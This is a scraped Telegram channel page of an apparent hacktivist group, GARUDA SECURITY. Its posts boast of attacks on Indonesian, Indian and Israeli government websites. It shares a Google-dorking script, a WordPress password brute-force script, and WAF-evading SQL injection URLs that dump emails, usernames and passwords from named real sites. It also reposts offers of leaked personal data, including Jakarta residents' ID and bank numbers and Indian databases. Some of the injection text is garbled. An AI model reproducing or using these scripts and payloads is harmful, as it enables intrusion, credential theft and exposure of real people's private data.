GARUDA SECURITY


Гео и язык канала: не указан, не указан
Категория: не указана


GARUDA SECURITY nothing else
Sosial media
TIKTOK: https://www.tiktok.com/@fahx7non
Instagram: https://instagram.com/garudasecurity6666
Saweria: https://saweria.co/FAHX7NON

Связанные каналы  |  Похожие каналы

Гео и язык канала
не указан, не указан
Категория
не указана
Статистика
Фильтр публикаций




[ + ] Attack By GarudaSecurity

[ + ] Target Country: Indonesia

[ + ] Site Target: https://www.indonesia.go.id/

[ + ] Message: REMEMBERING BLACK SEPTEMBER

#GarudaSecurity
#GanoSecTeam
#Garnesia-Id
#SpiderR70
#SiberTeamX
#CyberErrorSystem
#OpBatam
#SvRempang


[ + ] Note: Selamat saya rehat, saya akan share tools yang berguna untuk operasi operasi lain nya


[ + ]Message By: SukaJanda01



#GarudaSecurity
#GanoSecTeam
#Garnesia-Id
#SiberTeamX
#CyberErrorSystem


Berikut ini adalah contoh script python untuk melakukan dorking pada website:

import requests

# List of Dork's
dorks = [
"site:example.com intext:'keyword1'",
"site:example.com intext:'keyword2'",
"site:example.com intext:'keyword3'",
"site:example.com intext:'keyword4'"
]

# Variable to store search results
results = []

# Iterate through all the dork's one by one
for dork in dorks:
# Make a request to the google search with that dork
r = requests.get('https://www.google.com/search', params={'q':dork, 'num':'100'})
# Get the response content
data = r.content
# Split the html by newline
splitted_data = data.split("\n")
# Iterate through each line
for line in splitted_data:
# Check if the line contains the url
if '


[ + ] Ini adalah suatu kode python untukmu brute force password wordpress


import requests
import sys

# Meminta nama pengguna dan nama situs WordPress dari pengguna
user = input("Masukkan nama pengguna: ")
site = input("Masukkan URL WordPress: ")

# Meminta wordlist password dari pengguna
wp_passwords = input("Masukkan nama file dengan wordlist password: ")

# Membaca file wordlist password
passwords = open(wp_passwords, 'r').readlines()

# Memulai loop untuk memeriksa setiap password dalam wordlist
for password in passwords:
#Menset variabel payload dengan nama pengguna dan password
payload = {'log': user, 'pwd': password.strip()}

# Menjalankan permintaan ke situs dengan payload
r = requests.post(site + 'wp-login.php', data=payload)

# Melihat jika respon tidak mengandung tulisan "gagal"
if "Gagal" not in r.text:
print("[+] Berhasil - Passwordnya adalah: %s" % (password))
sys.exit(0)
else:
print("[-] Gagal - Password Salah: %s" % (password))


[ + ] Target: https://ncrb.gov.in/

[ + ] Report: https://check-host.net/check-http?host=https%3A%2F%2Fncrb.gov.in%2F&csrf_token=81915a57e23dce5dd8326ae27d5c6607ace14d22

[ + ] Country: India

"You stupids"

#GarudaSecurity
#GanoSecTeam
#JambiCyberTeam
#SiberTeamX
#CyberErrorSystem
#Garnesia-id
#SabunBolongCyberClub
#CyberSederhanaTeam
#SpiderR70


Report?


Join to my chanel

t.me/garudasec3

t.me/garudasec4


Query https://escolamega.com.br/single-gallery.php?id=40%27/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3--+

DIOS : @x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**8**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x3c6c693e,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x),3--+' rel='nofollow'>https://escolamega.com.br/single-gallery.php?id=40%27/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**8**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x3c6c693e,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x),3--+

DUMP :: @x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(px_clients)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x3c6c693e,email))))x),3--8P' rel='nofollow'>https://escolamega.com.br/single-gallery.php?id=40%27/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(px_clients)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x3c6c693e,email))))x),3--8P :: 8://escolam8//*!50000select*//d/1,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(px_clients)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x3c6c693e,password))))x),3--8P :: 8://escolam8om.br/single-gall8hp?id=40%27/c/8*8assword)))8--8P :: 8://@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(px_users)WHERE(@x)IN(@x:=CONCAT(0x20,83c6c/mod(9,9)/)//*!50000union*//8//*!50000select*//d=40%27/**8**/8*8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(px_users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x3c6c693e,username))))x),3--+' rel='nofollow'>escol8.br/single-gall8hp80%27/**8**/8*8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(px_users)WHERE(@x)IN(@x:=CONCAT(0x20,83c6c/mod(9,9)/)//*!50000union*//8//*!50000select*//d=40%27/**8**/8*8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(px_users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x3c6c693e,username))))x),3--+


[ + ]Brazil website

Inject By SukaJanda01

#GarudaSecurity


[?] site: http://www.thepoolhousesc.com/viewPhoto.php?id=96

Version:5.6.51-cll-lve
User server: ThePoolHouse@p3plcpnl1101.prod.phx3.secureserver.net
Database: ThePoolHouse
Query: http://www.thepoolhousesc.com/viewPhoto.php?id=96/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3,4,5,6--+
angka yg di tampilkan: 2,6,3,5,

[ + ] INJECT BY GARUDASECURITY


[ + ] HAHA STUPID COUNTRY

[ ]Target country: Israel

[ + ] Target site: https://www.gov.il/

[ + ] Report: https://check-host.net/check-http?host=https%3A%2F%2Fwww.gov.il%2F&csrf_token=d307af6f8e78123903d34785ed98bcc64a8d3950


[ + ] MESSAGE
"GIVE FREEDOM TO PALESTINE 🇵🇸"

#GARUDASECURITY
#GANOSECTEAM
#JAMBICYBERTEAM
#CYBERERRORSYSTEM
#SIBERTEAMX
#GARNESIA-ID
#ACEHABOUTHACKERWORLD
#TEAM_R70
#SAVE_PALESTINE🇵🇸❤️
#FuckYouIsrael


Haha tools baru


Репост из: StarsX Team ( PUB )
data2.html
994.2Кб


Репост из: StarsX Team ( PUB )
type : database

26rb+ data pribadi warga jakarta

format :
nama, nik, no kk, no ktp, no kip, no telp, npwp, nama bank, no rekening, tanggal lahir, tempat lahir, pendidikan, lokasi, alamat tinggal

ext : html
note : ::0:: berarti blank/kosong

my team telegram group : https://t.me/StarsXTeam


Репост из: 444 OFICIAL CHANEL
[ + ] WH00PZ ! LEAKED BY MRSANZZ [ + ]
TEAM : EIHT

OVER 7K + DATABASES OF INDIA HAS BEEN LEAKED

Size : 72mb
Zip : 85mb (maybe)
doc type : doc, docx, pdf

#EternightyIHT
#EIHT
#MrSanZz
#LeakedDB
#7000+


Репост из: JAMBI CYBER TEAM
👍👍

Показано 16 последних публикаций.

29

подписчиков
Статистика канала